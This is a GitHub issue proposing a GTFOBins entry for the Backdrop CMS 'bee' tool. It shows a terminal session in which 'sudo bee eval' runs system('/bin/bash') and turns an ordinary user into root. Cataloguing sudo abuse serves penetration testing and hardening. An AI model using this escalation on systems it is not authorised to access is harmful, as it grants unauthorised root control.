GTFOBins.github.io icon indicating copy to clipboard operation
GTFOBins.github.io copied to clipboard

Added bee sudo function to GTFObins

Open t3rp opened this issue 6 months ago • 0 comments

Bee sudo function added, project details below:

  • https://backdropcms.org/project/bee
  • https://github.com/backdrop-contrib/bee

Example:

terp@dev:/var/www/html$ whoami
terp
terp@dev:/var/www/html$ sudo bee eval "system('/bin/bash');"
root@dev:/var/www/html# whoami
root

t3rp avatar Apr 18 '25 15:04 t3rp